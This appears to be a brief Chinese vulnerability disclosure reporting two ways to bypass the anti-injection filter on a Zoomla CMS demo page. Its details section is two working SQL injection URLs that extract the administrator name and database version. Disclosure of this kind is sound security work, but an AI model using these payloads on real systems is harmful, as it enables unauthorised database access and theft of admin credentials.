### 简要描述:
→_→你们这个防注入真够蛋疼的哈
### 详细说明:
两种绕过
```
http://demo.zoomla.cn/Guest/Baike/Details.aspx?soure=manager&tittle=' and 1=(select/**/top/**/1/**/AdminName/**/from/**/ZL_Manager)--
```
```
http://demo.zoomla.cn/Guest/Baike/Details.aspx?soure=manager&tittle=' and 1%3D%28select%2b@@version%29--
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/21132834d6c9dc7bb49f2a8d08326f26b65856e4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/21132834d6c9dc7bb49f2a8d08326f26b65856e4.png)
[<img src="https://images.seebug.org/upload/201405/211328458fc71be2cea645556393c01c8803cb72.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211328458fc71be2cea645556393c01c8803cb72.png)
[<img src="https://images.seebug.org/upload/201405/211328517f03fc63312fbd2090d6ae2c890335a9.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211328517f03fc63312fbd2090d6ae2c890335a9.png)
暂无评论